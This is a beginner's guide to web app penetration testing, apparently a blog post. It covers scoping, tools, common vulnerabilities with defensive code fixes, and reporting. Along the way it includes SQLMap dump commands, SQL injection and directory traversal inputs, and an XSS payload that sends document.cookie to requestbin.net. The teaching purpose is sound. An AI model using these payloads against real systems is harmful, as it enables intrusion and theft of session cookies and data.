
A Beginners Guide To Everything WebApp Pentesting

So you want to be a pentester

    There are a ton of different types of pentesting that you can do. What we'll talk about here is website pentesting. This is the type of pentesting that helps developers secure websites that you and potentially people around the globe will have access to, so it's pretty important. But there are a lot of ways to strip away the value it can bring project owners. Some testers, for instance, will only run automated tools, don't understand the output those tools generate, and just hand over a report. This is unhelpful because, as a pentester, it's your duty to know why vulnerabilities appear in Burp and how to resolve them. Building on that, as well as understanding the vulnerabilities themselves, you should understand any solutions you offer and avoid canned suggestions. Today we will review the necessary prep work, which tools to use, common vulnerabilities to look for, and how to put it all together in a report. This post is intended for people who are new to web app pentesting or those who want to know, at a semi-technical level, what's needed to succeed. Also note, all demonstrations use either culbertreport.com or a vulnerable version of OrangeHRM/LotusCMS.

The paperwork

    Before you begin an actual pentest, there are some important items to get out of the way. Of those, permission and scope are the most important. Get a proper scope defined for which URLs are valid, which accounts can be targeted, and what must be explicitly avoided. In the same vein, make sure you have full permission from the website owners to perform the pentest. Without these, you're treading on thin ice.
 

    The typical scope discussion and documentation will cover which URLs, like subdir1.staging.culbertreport.com, are in scope, whether you're testing the staging environment (and you should really only test there), and whether it contains real data. You need to know whether the data you may see is potentially real PHI, for example, as there are additional liabilities around this and BAAs that may need to be signed. You also may or may not be given an account to use, and you should be given a point of contact who controls the webapp environment. This contact is there to relay findings to, but also in case you get locked out of the testing environment, something breaks, or an attack accidentally leaks over to production and needs to be remedied.

Tools to use

    Now that you've gotten the paperwork out of the way, what tools do you use? There are a ton of tools out there, both paid and free, but really you will be fine using three of the five below for 99% of your engagements.

Burp Suite

    Tried and true. This is in everyone's toolbox because it has 99% of everything you will need in an engagement and, if it doesn't, there's either a plugin already made for it or you can write one yourself.
 
     
    For those unfamiliar with the tool, there's a LOT to take in on this screen. The majority of your work will be done in the Proxy and Repeater tabs. The Proxy is where you either direct your browser's traffic or launch a custom Chromium instance and watch all of the traffic you've generated pass through, and the Repeater lets you send the same request repeatedly while changing whatever parameters you wish. Other tabs you may use include the Sequencer, which tells you whether there are issues with how cookies are generated, and the Extender page, where you can download extensions like the one I have for JSON Web Tokens.
Burp Suite Enterprise

    Burp Enterprise is fantastic for automating the more mundane portions of your engagements, for passively collecting vulnerability details as you work, and for running auditing scans. If your organization can afford an enterprise license, the tools that come with it will make the cost well worth it. Some highlights worth noting include the auditing scans, which test every possible exploit against every URL - though it's very important that these are only run against a staging environment that can be broken, and you should not rely on them to find everything exploitable. Another highlight is that while you browse the site, Burp will passively note vulnerable components - for instance, a JS dependency that was missed by your manual investigation.

OWASP Zap

    The lesser-known cousin to Burp. It has much the same toolkit, just in a slightly different UI. There's not much to say here: it's a solid tool and you can't go wrong using it.
 
     
    If you're coming from Burp, this UI makes far less sense initially. But as you use it, it quickly becomes apparent where the features you've come to expect from Burp are hiding, and one bonus is that Zap will passively enumerate issues similar to how Burp Enterprise does.
 

    As well as the passive enumeration, the request editor works much the same way as Burp Suite's version, just with a slightly different UI.
 

SQLMap

    If you see SQL errors during an engagement, you can break out SQLMap to see if any of them are truly exploitable. I personally find SQLMap is best used with a valid request taken from Zap or Burp and saved to a text file. This way you don't have to spend time messing with authorization parameters to reach the point you want to test. The tool will be demonstrated further below, but your typical flow will look like this:
  1. sqlmap -r request.txt # SQLMap will figure out what position is exploitable in the request
  2. sqlmap -r request.txt --dbs  # We then get the different databases
  3. sqlmap -r request.txt -D target_DB --tables # Get the tables from the target DB
  4. sqlmap -r request.txt -D target_DB -T target_table --dump # Then finally dump the contents of the table

SSLscan 

    This tool, for the most part, is covered by what's provided through Burp Enterprise. But if you don't have one of those licenses, this will be a nice complement to your toolkit. SSLscan examines encrypted communications, such as HTTPS, and enumerates all the ciphers the server supports. This is the non-flashy side of web app testing, but determining whether weak ciphers, or protocols that would constitute regulatory failings, are in use is very important.
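
    If you're curious what a scan like this boils down to, here's a rough Python sketch that probes which TLS protocol versions a server will negotiate. The host is a hypothetical in-scope target, and real sslscan also enumerates individual ciphers; note the caveat in the comments.

```python
import socket
import ssl

HOST, PORT = "staging.culbertreport.com", 443  # hypothetical in-scope host

# Probe which TLS protocol versions the server is willing to negotiate.
for name, version in [
    ("TLS 1.0", ssl.TLSVersion.TLSv1),
    ("TLS 1.1", ssl.TLSVersion.TLSv1_1),
    ("TLS 1.2", ssl.TLSVersion.TLSv1_2),
    ("TLS 1.3", ssl.TLSVersion.TLSv1_3),
]:
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    ctx.minimum_version = version
    ctx.maximum_version = version
    try:
        with socket.create_connection((HOST, PORT), timeout=5) as sock:
            with ctx.wrap_socket(sock, server_hostname=HOST) as tls:
                print(f"{name}: accepted, cipher {tls.cipher()[0]}")
    except (ssl.SSLError, OSError):
        # Caveat: a hardened local OpenSSL build may itself refuse TLS 1.0/1.1,
        # so a "rejected" here is not proof the server disables them.
        print(f"{name}: rejected")
```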

Common vulnerabilities you'll test for

    Now that you've got your tools selected and tested, you'll want to start testing the website. But what do you look for, and why? Do you stick with the OWASP Top 10? It's a respectable list, but it's nowhere near inclusive of everything you should look at.

CSRF

    Cross-site request forgery. This one is easy to test for, and it's really important for testers to find attackable examples. It occurs when the application accepts requests whose Referer field is set to another host. Typically, when you click a function on a site, a request is sent and the Referer field tells the site where it's coming from.
 
 
    But with CSRF, this field is not properly validated. For example, see the below request.
 
     
    In the above picture, the Referer is set to attacker.com. Why is this bad? Take, for example, a site that requires admins to manually add new users. Through testing, you may be able to determine the fields expected when signing up a user, but you still don't have the required permissions to add yourself. If you can trick an admin-level user into clicking a button on another site that fires off this POST, though, and that admin has a currently valid session, all of a sudden you're signed up!
 
    
    An important note: validating the Referer field is not the only way to protect against CSRF. There are token-based systems that are more reliable, but these are more complex, and simply validating the Referer will get you 99.99% of the way there.
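
    To make that concrete, here's a minimal sketch of both defenses in Python using Flask. The framework, hostname, route names, and form fields here are illustrative assumptions, not how any particular target implements it.

```python
import secrets
from urllib.parse import urlparse

from flask import Flask, abort, request, session

app = Flask(__name__)
app.secret_key = "change-me"
OWN_HOST = "cr.culbertreport.com"  # assumption: the app's own hostname

@app.before_request
def check_csrf():
    if request.method == "POST":
        # Defense 1: the Referer header has to point back at our own host.
        referer_host = urlparse(request.headers.get("Referer", "")).netloc
        if referer_host != OWN_HOST:
            abort(403)
        # Defense 2 (the more reliable, token-based approach): the submitted
        # form must echo back the secret token tied to this user's session.
        if request.form.get("csrf_token") != session.get("csrf_token"):
            abort(403)

@app.route("/add_user_form")
def add_user_form():
    # Hand the browser a fresh token embedded in the form it will submit.
    session["csrf_token"] = secrets.token_hex(16)
    return (
        '<form method="POST" action="/add_user">'
        f'<input type="hidden" name="csrf_token" value="{session["csrf_token"]}">'
        '<button>Add user</button></form>'
    )

@app.route("/add_user", methods=["POST"])
def add_user():
    return "user added"
```

    A request fired from attacker.com fails both checks: its Referer points elsewhere, and it has no way to know the per-session token.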

XSS

    Cross-site scripting. Everyone's heard of it and everyone looks for it. But what is it actually doing, and why is it dangerous? First, there are a few different types of XSS to test for.
  1. The most common one I've seen is stored, which is where you enter something like a comment on a site and then any visitors afterwards will be affected. 
  2. Followed by that is reflected, which is when you send someone a link like https://cr.culbertreport.com/search?q=<script>alert(1)</script> and upon clicking this link they trigger the alert popup. 
  3. And finally there's DOM-based XSS. This refers to the document object model and can be thought of similarly to reflected XSS, but they attack two different functions. This one will be by far the most complicated to attack. I really encourage anyone curious to read the OWASP entry, as it explains it in the best way possible. This is also the only type of XSS that can be executed in such a way that the server never sees that the user fell victim to it. This is accomplished by using a # in the URI to create a fragment, so the XSS payload is loaded client side by the DOM rather than being sent to the server. 
    What each of these does is modify web pages to include attacker-supplied elements due to improper sanitization of user input. An attacker can then leverage this to do things like steal session cookies from users. With the stored XSS example, we can insert an element that grabs the document.cookie value from users who browse the page and sends it off to requestbin.net. That would then let you hijack their sessions and perform actions as the compromised users. 

    The typical protections for this are to escape special characters and sanitize the user input. Escaping in this case means invalidating potential HTML characters like "<" through methods like encoding. Sanitizing means stripping those special characters from the supplied input entirely.
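
    As a rough illustration of the escaping approach, here's a small Python sketch. The render function, the payload, and the requestbin path are made up for demonstration.

```python
from html import escape

def render_comment(comment_text: str) -> str:
    # Escaping turns characters like < and > into &lt; and &gt; so the browser
    # displays them as text instead of treating them as markup.
    return f"<div class='comment'>{escape(comment_text, quote=True)}</div>"

# A stored-XSS style payload is neutralized once it's escaped:
payload = "<script>new Image().src='https://requestbin.net/r/x?c='+document.cookie</script>"
print(render_comment(payload))
# -> the &lt;script&gt;... text is displayed as harmless text and never executes
```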

SQLi

    Another common one. This attack exploits sites that do not properly validate user-supplied input before executing SQL queries with it. A common test is to append a ' to the end of every input field and look for a 500 Internal Server Error response or a 200 OK that returns a SQL error. What you're doing with this test is opening a string and never closing it, which is why the server responds with a SQL error. This can be leveraged, either manually or automatically with SQLMap, to do things like dump database contents or pop a shell.

    There are a number of protections against SQL injection, ranging from prepared statements to doing what we did with XSS: escaping the supplied input and treating it as a string. They each have pros and cons, and it's important to remember that no solution is perfect. 
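
    Here's a quick Python sketch of why prepared statements help, using an in-memory SQLite database. The table and data are invented purely for the demo.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

user_input = "alice' OR '1'='1"  # the classic quote-breaking payload

# Vulnerable: the input is concatenated straight into the query text,
# so the payload rewrites the WHERE clause and matches every row.
vulnerable = f"SELECT * FROM users WHERE name = '{user_input}'"
print(conn.execute(vulnerable).fetchall())       # returns all rows

# Prepared statement: the value travels separately from the query text,
# so the payload is treated as a literal string and matches nothing.
safe = "SELECT * FROM users WHERE name = ?"
print(conn.execute(safe, (user_input,)).fetchall())  # returns []
```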

Directory traversal

    This occurs when attackers can access files outside of the website's root directory. You typically see this with people putting a series of '../' sequences into the URL hoping to escape, since the web server sometimes interprets this user input as an instruction to move up a directory.

    Protecting against this is typically about as simple as the attack itself. First, ensure that user input is valid and remove unexpected characters. Second, when processing resource requests, append the requested path to the folder's canonical path and verify the result still resolves inside it. This ensures that any requests stay inside the website's root directory.
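
    A minimal Python sketch of that canonical-path check might look like this. The web root path and helper name are assumptions for illustration.

```python
import os

WEB_ROOT = "/var/www/site/public"  # assumption: the site's web root on the host

def resolve_request(requested_path: str) -> str:
    # Join the user-supplied path onto the web root, then canonicalise it,
    # which collapses any ../ sequences the attacker supplied.
    candidate = os.path.realpath(os.path.join(WEB_ROOT, requested_path.lstrip("/")))
    # If the resolved path no longer sits under the web root, the request
    # escaped the directory and should be rejected.
    if not candidate.startswith(WEB_ROOT + os.sep):
        raise PermissionError("path traversal attempt")
    return candidate

print(resolve_request("css/site.css"))         # fine
print(resolve_request("../../../etc/passwd"))  # raises PermissionError
```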

User account takeover

    This is important to test for, as it could enable another, bigger issue: privilege escalation. It typically takes advantage of the password reset function. Oftentimes this function uses your cookie to identify who you are and whose password to reset, but sometimes the application passes a user ID to the back-end, which can then be modified, allowing the attacker to take over another user's account. 
 

    This falls under broken access control - a user should only have access to their own resources, so any request like this needs to be validated against their permissions. If proper validation were in place, the back-end would see this request, notice that the requested user ID did not match the requesting user's ID or permission level, and kick back an error.
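
    As a sketch of what that validation can look like, here's a hypothetical Flask-style password reset route that compares the requested account against the authenticated session. The route name and session layout are assumptions.

```python
from flask import Flask, abort, request, session

app = Flask(__name__)
app.secret_key = "change-me"

@app.route("/reset_password", methods=["POST"])
def reset_password():
    requested_id = request.form.get("user_id")
    # The back-end must compare the target account to the authenticated session.
    # Skipping this check is exactly the account-takeover bug described above.
    if requested_id != str(session.get("user_id")):
        abort(403)
    # ... proceed with the reset for the session's own account only ...
    return "password reset"
```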

Privilege escalation

    Privilege escalation comes right behind user account takeover because they often use the same method: poor validation on a password reset. Another method is forceful browsing. Sometimes when logging in, the page returns a redirect to the standard user page, and this can be modified to point to the admin page instead, allowing elevation of user privileges, especially if functions within the admin panel do not validate the user's privilege level. Forceful browsing like this can in some cases take guessing to determine the correct admin page location, unless you use a tool like Dirbuster to automate it.

    Developers should ensure that all requests are validated against the user's permission level. Both of these scenarios, forced browsing and accessing other users' information, also fall under broken access control.
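
    One simple way to picture that fix is a per-request role check, something like this hypothetical Flask decorator. The role name, route, and session field are illustrative only.

```python
from functools import wraps

from flask import Flask, abort, session

app = Flask(__name__)
app.secret_key = "change-me"

def require_role(role):
    def decorator(view):
        @wraps(view)
        def wrapped(*args, **kwargs):
            # Check the caller's server-side role on every request, so tampering
            # with the post-login redirect or browsing straight to /admin gains nothing.
            if session.get("role") != role:
                abort(403)
            return view(*args, **kwargs)
        return wrapped
    return decorator

@app.route("/admin/users")
@require_role("admin")
def admin_users():
    return "admin user list"
```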

Sensitive information disclosure

    Web developers often overlook the advantage that disclosures in error messages can give attackers. From them you can determine software versions, whether there is a SQL back-end, which file types are allowed to be uploaded, and where in your exploitation the server stopped and kicked back an error, to name a few.
 
    
    In the above example, I've now determined the framework version, the PHP version, and the MySQL version, as well as where errors are logged on the hosting server. This is all sensitive information, as I can now look up attacks specific to these version numbers, and it really simplifies the exploitation job. 

    Returning errors like this is really handy in development, since it helps pinpoint exactly what is breaking, but in a production environment it gives away too much information. Instead, return generic error pages that only let users know something went wrong or the requested page is missing.
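
    As a hedged sketch of what that looks like in practice, a production configuration might log the details server-side while handing the user only a generic message. The handler wiring and log destination below are assumptions, with Flask standing in as the example framework.

```python
import logging

from flask import Flask

app = Flask(__name__)
logging.basicConfig(filename="app.log", level=logging.ERROR)

@app.errorhandler(500)
def internal_error(exc):
    # Keep the full details server-side for the developers...
    app.logger.error("unhandled error", exc_info=exc)
    # ...but give the user nothing that reveals framework versions, database
    # details, or file paths on the host.
    return "Something went wrong. Please try again later.", 500

@app.errorhandler(404)
def not_found(exc):
    return "The requested page could not be found.", 404
```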

Malicious file uploads

    If a site allows you to upload things like PHP or HTML, this can be leveraged by attackers to perform actions like listing /etc/passwd.
 
    This one is overall pretty simple: if you can upload files other than what was intended, that's an issue that needs fixing. Sometimes developers do put filters in place and only look for image files, but they only check for strings like jpeg anywhere in the file name. So if you upload file.jpeg.php, this bypasses their filter.

    Developers should use an allow list of extensions and avoid deny lists - the number of possible extensions is far too large for any one person to keep track of. In addition, review that the allowed list of extensions contains only the bare minimum of file types needed for the application to function properly.
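
    Here's a minimal Python sketch of that allow-list check, judging the final extension rather than searching the whole file name. The extension set is just an example of a "bare minimum" list.

```python
import os

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}  # only what the app needs

def is_allowed(filename: str) -> bool:
    # Check the *final* extension, so file.jpeg.php is judged on ".php",
    # not on the "jpeg" string buried earlier in the name.
    _, ext = os.path.splitext(filename.lower())
    return ext in ALLOWED_EXTENSIONS

print(is_allowed("avatar.png"))     # True
print(is_allowed("file.jpeg.php"))  # False - the double-extension bypass is caught
```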

You found a vulnerability, so what?

    Finding the vulnerability is not the end; your next responsibility is helping the client and developers fix the issues. Understanding what goes into fixing these issues is absolutely an important skill for quality pentesters to have.

    There's no shame in looking up the vulnerability on OWASP and finding a suggested solution there, but you should definitely understand why that solution works in the supplied example and be prepared for developer use cases to veer from the recommendations. Also be prepared for company priorities to shift and your finding to be downgraded. Just because OWASP says it's a high doesn't mean your client or development team will feel the same way, and ultimately it's their issue to deal with how they want. 

    Take, for example, SQL injection. This is a common vulnerability to encounter and OWASP has a number of suggestions for protecting against it, so which should you pick? You have prepared statements, stored procedures, allow-list input validation, and escaping all user-supplied input. They each have pros and cons. For instance, escaping user-supplied input assumes that you are actually catching all escape attempts. On the other hand, prepared statements are generally thought of as stopping SQL injection attempts against the parser, but they still leave things like logging who writes what and user-defined triggers vulnerable to SQL injection. Not to mention some people concatenate supplied input into strings to build their prepared statements, which defeats the purpose. There are a lot of ways that attempting to solve an issue can actually open you up to further damage, so understanding the environment and the solutions you will suggest is critical.

Writing your report

    This can vary organization to organization, but typically a report will include a high-level discussion of the issues detected, their impact, and a total count of all the detected vulnerabilities, followed by a table of each with supporting evidence. You should sort the detected vulnerabilities from high to low so that important issues catch the reader's attention early, and include clear steps for how to reproduce the detected issues to make developers' lives easier. The faster the developers can see it in action, the faster they can determine where a fix needs to be placed and get it rolled out to staging. 

    The high-level discussion allows you to outline vulnerabilities you thought were of note and discuss their potential impact if left unpatched. Getting across the right amount of urgency is crucial: too little will result in people leaving gaping holes, while too much will have them treating future findings more lightly than perhaps they should. Think about the potential impact to client and customer data, or the reputational impact, in order to judge how critical it is that something be patched in a week versus in 90 days.

    Adding as much detail as possible to the client-facing report will reduce frustration on both ends, as the developers can begin implementing fixes and the testers can focus on other work that needs to be done. Make sure you have your target audience in mind when writing it, too: going too technical will result in misunderstandings, while leaving it too high level will have the report recipients scratching their heads trying to figure out exactly what you meant.

And that's it!

    This is what it takes, at a basic level, to be a competent pentester. Writing detailed reports and working with developers will be more than half your job. This is not a position where you can succeed without working with others, so be especially prepared to work with developers who are completely unfamiliar with working within a security context. Have sympathy, as it's not their realm of expertise, and they brought you in specifically to help them shore up this area. You can also learn a great deal from them on architecture and design philosophy.
This post is licensed under CC BY 4.0 by the author.